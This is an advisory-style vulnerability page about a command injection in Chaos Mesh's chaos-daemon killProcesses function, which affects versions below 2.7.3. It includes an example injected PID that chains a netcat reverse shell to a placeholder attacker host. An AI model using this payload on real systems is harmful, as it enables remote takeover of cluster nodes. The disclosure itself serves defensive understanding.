-
CVSS Score
-Basic Information
CVE ID
-
GHSA ID
-
EPSS Score
-
CWE
-
Published
-
Updated
-
KEV Status
-
Technology
-
Technical Details
Vulnerability Intelligence
Miggo AI
Miggo AIMiggo AI| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| github.com/chaos-mesh/chaos-mesh | go | < 2.7.3 | 2.7.3 |
Miggo AIRoot Cause AnalysisThe vulnerability is a classic OS command injection. The killProcesses mutation in the Chaos Controller Manager takes process IDs (PIDs) as input to be killed. This request is forwarded to the chaos-daemon running on the target node. The killProcesses function within the chaos-daemon constructs a kill command by concatenating the user-provided PID string directly into the command line. Because the PID is not validated to be a numeric string, an attacker can inject arbitrary shell commands. For example, a PID of 123; nc -e /bin/sh attacker.com 4444 would execute a reverse shell. The provided commit and pull request are a mitigation that disables the control server by default, reducing the attack surface, but the underlying command injection vulnerability exists in the killProcesses function itself. The actual fix, which is not in the provided commits, would be to sanitize the input and ensure that only valid numeric PIDs are passed to the kill command.
GoGoOngoing coverage of React2Shell